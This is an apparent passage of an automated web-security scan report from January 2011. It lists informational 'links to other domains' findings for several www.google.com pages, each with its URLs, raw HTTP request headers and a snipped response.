Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:39:53 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: cffe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<noscript><meta http-equiv=refresh content="0; URL=/prdhp?hl=en&tab=wf&output=noj
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=f1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

20.670. http://www.google.com/preferences previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/preferences

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/preferences?hl=en

The response contains the following link to another domain:

http://www.youtube.com/?hl=en&tab=w1

Request

GET /preferences?hl=en HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Date: Mon, 24 Jan 2011 16:39:50 GMT
Expires: -1
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><META HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8"><title>Preferences</title><style>body,td,div,.p,a{font-family:arial,sans-serif}h1,h2{display:inline;margin:0}h1{font-size
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

20.671. http://www.google.com/realtime previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/realtime

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/realtime?hl=en&tab=wY

The response contains the following link to another domain:

http://www.youtube.com/?hl=en&tab=Y1

Request

GET /realtime?hl=en&tab=wY HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:40:00 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="See up-to-the-second social updates about hot topics around the world.">
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=Y1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

20.672. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?hl=en&q=related:www.e&tbo=1&sa=X&ei=3wT0TJ&tbo=1&sa=X&ei=3wT0T&tbo=1&sa=X&ei=3wT0TWJ_5AKtpypmg8&ved=0CJUBEB8wD&tbo=1&sa=X&ei=3wT0TJwww.&tbo=1&sa=X&ei=3wT0TQoQg

The response contains the following links to other domains:

http://cnx.org/content/m10865/latest/
http://en.wikipedia.org/wiki/Electronic_commerce
http://erc.unesco.org/websitetoolkit/en/guide/p3.htm
http://in.answers.yahoo.com/question/index?qid=20101203211238AAa40sx
http://map.ais.ucla.edu/portal/site/UCLA/menuitem.789d0eb6c76e7ef0d66b02ddf848344a/?vgnextoid=6f438182fbf54210VgnVCM100000e1d76180RCRD
http://webcache.googleusercontent.com/search?q=cache:0jK2TZZG-CcJ:www.uwex.edu/ces/csreesvolmon/EColi/RelatedResearch.htm+related:www.e&cd=1&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:9v5_HzJbdiwJ:map.ais.ucla.edu/portal/site/UCLA/menuitem.789d0eb6c76e7ef0d66b02ddf848344a/%3Fvgnextoid%3D6f438182fbf54210VgnVCM100000e1d76180RCRD+related:www.e&cd=5&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:EbScv4wHmsAJ:erc.unesco.org/websitetoolkit/en/guide/p3.htm+related:www.e&cd=7&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:Evk0-NEhFUsJ:en.wikipedia.org/wiki/Electronic_commerce+related:www.e&cd=8&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:KJLzPiEJ5goJ:www.health.state.mn.us/e-health/lawsmn.html+related:www.e&cd=9&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:Lv7ktS2B8NoJ:www.umbc.edu/wmst/forums.html+related:www.e&cd=2&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:aLIFjmf3uFIJ:www.fsis.usda.gov/Science/Ecoli_O157_Timeline/index.asp+related:www.e&cd=4&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:hPuxMLLyT28J:in.answers.yahoo.com/question/index%3Fqid%3D20101203211238AAa40sx+related:www.e&cd=3&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:spYQnocqe2AJ:cnx.org/content/m10865/latest/+related:www.e&cd=6&hl=en&ct=clnk&gl=us
http://www.eff.org/related/377/blog
http://www.fsis.usda.gov/Science/Ecoli_O157_Timeline/index.asp
http://www.health.state.mn.us/e-health/lawsmn.html
http://www.umbc.edu/wmst/forums.html
http://www.uwex.edu/ces/csreesvolmon/EColi/RelatedResearch.htm
http://www.youtube.com/results?hl=en&q=related:www.e&um=1&ie=UTF-8&sa=N&tab=w1

Request

GET /search?hl=en&q=related:www.e&tbo=1&sa=X&ei=3wT0TJ&tbo=1&sa=X&ei=3wT0T&tbo=1&sa=X&ei=3wT0TWJ_5AKtpypmg8&ved=0CJUBEB8wD&tbo=1&sa=X&ei=3wT0TJwww.&tbo=1&sa=X&ei=3wT0TQoQg HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Date: Mon, 24 Jan 2011 16:40:15 GMT
Expires: -1
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>related:www.e - Google Search</title><script>window.google={kEI:"b6s9TbnNEcSdgQeems2eCA",kEXPI:"17259,17291
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&q=related:www.e&um=1&ie=UTF-8&sa=N&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.uwex.edu/ces/csreesvolmon/EColi/RelatedResearch.htm" class=l onmousedown="return clk(this.href,'','','','1','','0CCIQFjAA')">Research <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:0jK2TZZG-CcJ:www.uwex.edu/ces/csreesvolmon/EColi/RelatedResearch.htm+related:www.e&cd=1&hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'','','','1','','0CCQQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.umbc.edu/wmst/forums.html" class=l onmousedown="return clk(this.href,'','','','2','','0CCUQFjAB')">Women- and Gender-<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Lv7ktS2B8NoJ:www.umbc.edu/wmst/forums.html+related:www.e&cd=2&hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'','','','2','','0CCcQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://in.answers.yahoo.com/question/index?qid=20101203211238AAa40sx" class=l onmousedown="return clk(this.href,'','','','3','','0CCkQFjAC')">Question <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:hPuxMLLyT28J:in.answers.yahoo.com/question/index%3Fqid%3D20101203211238AAa40sx+related:www.e&cd=3&hl=en&ct=clnk&gl=us" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:hPuxMLLyT28J:in.answers.yahoo.com/question/index%3Fqid%3D20101203211238AAa40sx+related:www.e&cd=3&hl=en&ct=clnk&gl=us','','','','3','','0CC0QIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.fsis.usda.gov/Science/Ecoli_O157_Timeline/index.asp" class=l onmousedown="return clk(this.href,'','','','4','','0CC4QFjAD')">Timeline of Events <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:aLIFjmf3uFIJ:www.fsis.usda.gov/Science/Ecoli_O157_Timeline/index.asp+related:www.e&cd=4&hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'','','','4','','0CDAQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://map.ais.ucla.edu/portal/site/UCLA/menuitem.789d0eb6c76e7ef0d66b02ddf848344a/?vgnextoid=6f438182fbf54210VgnVCM100000e1d76180RCRD" class=l onmousedown="return clk(this.href,'','','','5','','0CDEQFjAE')">PPSM 21 Technical Revisions <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:9v5_HzJbdiwJ:map.ais.ucla.edu/portal/site/UCLA/menuitem.789d0eb6c76e7ef0d66b02ddf848344a/%3Fvgnextoid%3D6f438182fbf54210VgnVCM100000e1d76180RCRD+related:www.e&cd=5&hl=en&ct=clnk&gl=us" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:9v5_HzJbdiwJ:map.ais.ucla.edu/portal/site/UCLA/menuitem.789d0eb6c76e7ef0d66b02ddf848344a/%3Fvgnextoid%3D6f438182fbf54210VgnVCM100000e1d76180RCRD+related:www.e&cd=5&hl=en&ct=clnk&gl=us','','','','5','','0CDMQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://cnx.org/content/m10865/latest/" class=l onmousedown="return clk(this.href,'','','','6','','0CDQQFjAF')">The Circle of Fifths</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:spYQnocqe2AJ:cnx.org/content/m10865/latest/+related:www.e&cd=6&hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'','','','6','','0CDgQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://erc.unesco.org/websitetoolkit/en/guide/p3.htm" class=l onmousedown="return clk(this.href,'','','','7','','0CDoQFjAG')">UNESCO - Create and Maintain a Website and other IT-<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:EbScv4wHmsAJ:erc.unesco.org/websitetoolkit/en/guide/p3.htm+related:www.e&cd=7&hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'','','','7','','0CDwQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Electronic_commerce" class=l onmousedown="return clk(this.href,'','','','8','','0CD4QFjAH')">Electronic commerce - Wikipedia, the free encyclopedia</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Evk0-NEhFUsJ:en.wikipedia.org/wiki/Electronic_commerce+related:www.e&cd=8&hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'','','','8','','0CEAQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.health.state.mn.us/e-health/lawsmn.html" class=l onmousedown="return clk(this.href,'','','','9','','0CEIQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:KJLzPiEJ5goJ:www.health.state.mn.us/e-health/lawsmn.html+related:www.e&cd=9&hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'','','','9','','0CEQQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.eff.org/related/377/blog" class=l onmousedown="return clk(this.href,'','','','10','','0CEYQFjAJ')"><em>
...[SNIP]...

20.673. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?hl=en&q=+site:MWJ_5AKtpypmg8&ved=0CDAQrAM

The response contains the following link to another domain:

http://www.youtube.com/results?hl=en&q=site:MWJ_5AKtpypmg8&um=1&ie=UTF-8&sa=N&tab=w1

Request

GET /search?hl=en&q=+site:MWJ_5AKtpypmg8&ved=0CDAQrAM HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

20.674. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?hl=en&q=GMWJ_5AKtpypmg8&sa=X&oi=&ct=image&resnum=5&ved=0Csearch?hl=en&q=p&um=1&ie=UTF-8&tbo=u&tbs=bks:1&source=og&sa=N&tab=wp

The response contains the following link to another domain:

http://www.youtube.com/results?hl=en&resnum=5&q=p&um=1&ie=UTF-8&sa=N&tab=p1

Request

GET /search?hl=en&q=GMWJ_5AKtpypmg8&sa=X&oi=&ct=image&resnum=5&ved=0Csearch?hl=en&q=p&um=1&ie=UTF-8&tbo=u&tbs=bks:1&source=og&sa=N&tab=wp HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

20.675. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?hl=en&q=related:www.a&tbo=1&sa=X&ei=3wT0TMMWJ_5AKtpypmg8&ved=0CGEQHzA0BEKEI

The response contains the following links to other domains:

http://biotech.icmb.utexas.edu/botany/cite.html
http://stason.org/TULARC/history/vietnam/97-General-Sites-Vietnam-Related-WWW-Resources.html
http://webcache.googleusercontent.com/search?q=cache:HfncsywxE84J:www.ableize.com/society-and-culture/Blogs-Disability-Related/+related:www.a&cd=8&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:Iqwuc7RdBrgJ:www.ala.org/ala/mgrps/divs/acrl/issues/infolit/resources/links/index.cfm+related:www.a&cd=3&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:QdBzjL3__icJ:www.facebook.com/myrelatives+related:www.a&cd=9&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:Qdu9zt6w-LQJ:www.musc.edu/tmsmirror/WWWpages.html+related:www.a&cd=1&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:W1frUZz64QsJ:www.ala.org/ala/mgrps/divs/acrl/about/sections/is/projpubs/bibcitations.cfm+related:www.a&cd=4&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:iesY4Xatv3cJ:stason.org/TULARC/history/vietnam/97-General-Sites-Vietnam-Related-WWW-Resources.html+related:www.a&cd=5&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:isMHz8jsKq8J:www.geo.cornell.edu/geology/classes/Geochemweblinks.HTML+related:www.a&cd=2&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:jfZwnLY0cfUJ:zibzoom.com/search%3Fpage%3D6%26limit%3D10%26engine%3Dgoogle_web%26query%3Drelated%253Awww.paglamusic.com%252F...%252Fvideo.php%253F...videos%25252FaIu6kdWMhGc%25252Frelated+related:www.a&cd=10&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:osy5Soj_xa8J:biotech.icmb.utexas.edu/botany/cite.html+related:www.a&cd=7&hl=en&ct=clnk&gl=us
http://www.ableize.com/society-and-culture/Blogs-Disability-Related/
http://www.ala.org/ala/mgrps/divs/acrl/about/sections/is/projpubs/bibcitations.cfm
http://www.ala.org/ala/mgrps/divs/acrl/issues/infolit/resources/links/index.cfm
http://www.awma.org/about/related_orgs.html
http://www.examiner.com/african-american-entertainment-in-national/is-oprah-winfrey-s-secret-related-to-her-father-vernon
http://www.facebook.com/myrelatives
http://www.geo.cornell.edu/geology/classes/Geochemweblinks.HTML
http://www.klfy.com/Global/story.asp?S=13894048
http://www.musc.edu/tmsmirror/WWWpages.html
http://www.reuters.com/article/idUSTRE70N0XR20110124
http://www.youtube.com/results?hl=en&q=related:www.a&um=1&ie=UTF-8&sa=N&tab=w1
http://zibzoom.com/search?page=6&limit=10&engine=google_web&query=related%3Awww.paglamusic.com%2F...%2Fvideo.php%3F...videos%252FaIu6kdWMhGc%252Frelated

Request

GET /search?hl=en&q=related:www.a&tbo=1&sa=X&ei=3wT0TMMWJ_5AKtpypmg8&ved=0CGEQHzA0BEKEI HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Date: Mon, 24 Jan 2011 16:40:14 GMT
Expires: -1
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>related:www.a - Google Search</title><script>window.google={kEI:"bqs9Ta_RHoXZgAfonYy1CA",kEXPI:"17259,17291
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&q=related:www.a&um=1&ie=UTF-8&sa=N&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.musc.edu/tmsmirror/WWWpages.html" class=l onmousedown="return clk(this.href,'','','','1','','0CCIQFjAA')">TMS-<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Qdu9zt6w-LQJ:www.musc.edu/tmsmirror/WWWpages.html+related:www.a&cd=1&hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'','','','1','','0CCQQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.geo.cornell.edu/geology/classes/Geochemweblinks.HTML" class=l onmousedown="return clk(this.href,'','','','2','','0CCYQFjAB')">Geochemistry Web Links</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:isMHz8jsKq8J:www.geo.cornell.edu/geology/classes/Geochemweblinks.HTML+related:www.a&cd=2&hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'','','','2','','0CCgQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ala.org/ala/mgrps/divs/acrl/issues/infolit/resources/links/index.cfm" class=l onmousedown="return clk(this.href,'','','','3','','0CCoQFjAC')">ACRL | Links-<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Iqwuc7RdBrgJ:www.ala.org/ala/mgrps/divs/acrl/issues/infolit/resources/links/index.cfm+related:www.a&cd=3&hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'','','','3','','0CCwQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ala.org/ala/mgrps/divs/acrl/about/sections/is/projpubs/bibcitations.cfm" class=l onmousedown="return clk(this.href,'','','','4','','0CC0QFjAD')">ACRL | IS | Bibliography of Citations <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:W1frUZz64QsJ:www.ala.org/ala/mgrps/divs/acrl/about/sections/is/projpubs/bibcitations.cfm+related:www.a&cd=4&hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'','','','4','','0CC8QIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://stason.org/TULARC/history/vietnam/97-General-Sites-Vietnam-Related-WWW-Resources.html" class=l onmousedown="return clk(this.href,'','','','5','','0CDIQFjAE')">97 General Sites (Vietnam <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:iesY4Xatv3cJ:stason.org/TULARC/history/vietnam/97-General-Sites-Vietnam-Related-WWW-Resources.html+related:www.a&cd=5&hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'','','','5','','0CDQQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.awma.org/about/related_orgs.html" class=l onmousedown="return clk(this.href,'','','','6','','0CDUQFjAF')"><em>
...[SNIP]...
<h3 class="r"><a href="http://biotech.icmb.utexas.edu/botany/cite.html" class=l onmousedown="return clk(this.href,'','','','7','','0CDcQFjAG')">Cyberbotanica: Bibliography and <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:osy5Soj_xa8J:biotech.icmb.utexas.edu/botany/cite.html+related:www.a&cd=7&hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'','','','7','','0CDkQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ableize.com/society-and-culture/Blogs-Disability-Related/" class=l onmousedown="return clk(this.href,'','','','8','','0CDsQFjAH')">Blogs - Disability <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:HfncsywxE84J:www.ableize.com/society-and-culture/Blogs-Disability-Related/+related:www.a&cd=8&hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'','','','8','','0CD8QIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.facebook.com/myrelatives" class=l onmousedown="return clk(this.href,'','','','9','','0CEEQFjAI')">We're <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:QdBzjL3__icJ:www.facebook.com/myrelatives+related:www.a&cd=9&hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'','','','9','','0CEMQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://zibzoom.com/search?page=6&limit=10&engine=google_web&query=related%3Awww.paglamusic.com%2F...%2Fvideo.php%3F...videos%252FaIu6kdWMhGc%252Frelated" class=l onmousedown="return clk('http://zibzoom.com/search?page=6&limit=10&engine=google_web&query=related%3Awww.paglamusic.com%2F...%2Fvideo.php%3F...videos%252FaIu6kdWMhGc%252Frelated','','','','10','','0CEQQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:jfZwnLY0cfUJ:zibzoom.com/search%3Fpage%3D6%26limit%3D10%26engine%3Dgoogle_web%26query%3Drelated%253Awww.paglamusic.com%252F...%252Fvideo.php%253F...videos%25252FaIu6kdWMhGc%25252Frelated+related:www.a&cd=10&hl=en&ct=clnk&gl=us" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:jfZwnLY0cfUJ:zibzoom.com/search%3Fpage%3D6%26limit%3D10%26engine%3Dgoogle_web%26query%3Drelated%253Awww.paglamusic.com%252F...%252Fvideo.php%253F...videos%25252FaIu6kdWMhGc%25252Frelated+related:www.a&cd=10&hl=en&ct=clnk&gl=us','','','','10','','0CEYQIDAJ')">Cached</a>
...[SNIP]...
<li class=w0 style=list-style-position:outside><a href="http://www.reuters.com/article/idUSTRE70N0XR20110124" class=l onmousedown="return clk(this.href,'','','','11','','0CEcQqQIwCg')">Clinton to focus on drug-<em>
...[SNIP]...
<div style=max-width:509px><a href="http://www.klfy.com/Global/story.asp?S=13894048" class=l onmousedown="return clk(this.href,'','','','12','','0CEsQqQIwCw')">Man pleads guilty to fraud <em>
...[SNIP]...
<div style=max-width:509px><a href="http://www.examiner.com/african-american-entertainment-in-national/is-oprah-winfrey-s-secret-related-to-her-father-vernon" class=l onmousedown="return clk(this.href,'','','','13','','0CE4QqQIwDA')">Is Oprah Winfrey's secret <em>
...[SNIP]...

20.676. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?hl=en&q=p&um=1&ie=UTF-8&tbo=u&tbs=vid:1&source=og&sa=N&tab=wv

The response contains the following links to other domains:

http://img.youtube.com/vi/BR4yQFZK9YM/default.jpg
http://img.youtube.com/vi/FJfFZqTlWrQ/default.jpg
http://img.youtube.com/vi/P-AYAv0IoWI/default.jpg
http://img.youtube.com/vi/eocCPDxKq1o/default.jpg
http://img.youtube.com/vi/nJ3ZM8FDBlg/default.jpg
http://vimeo.com/7743200
http://www.channel4.com/programmes/peep-show/4od
http://www.pp2g.tv/va396YnI_.aspx
http://www.southparkstudios.com/clips/185672
http://www.spike.com/video/978359
http://www.youtube.com/results?hl=en&q=p&um=1&ie=UTF-8&sa=N&tab=v1
http://www.youtube.com/watch?v=BR4yQFZK9YM
http://www.youtube.com/watch?v=FJfFZqTlWrQ
http://www.youtube.com/watch?v=P-AYAv0IoWI
http://www.youtube.com/watch?v=eocCPDxKq1o
http://www.youtube.com/watch?v=nJ3ZM8FDBlg

Request

GET /search?hl=en&q=p&um=1&ie=UTF-8&tbo=u&tbs=vid:1&source=og&sa=N&tab=wv HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
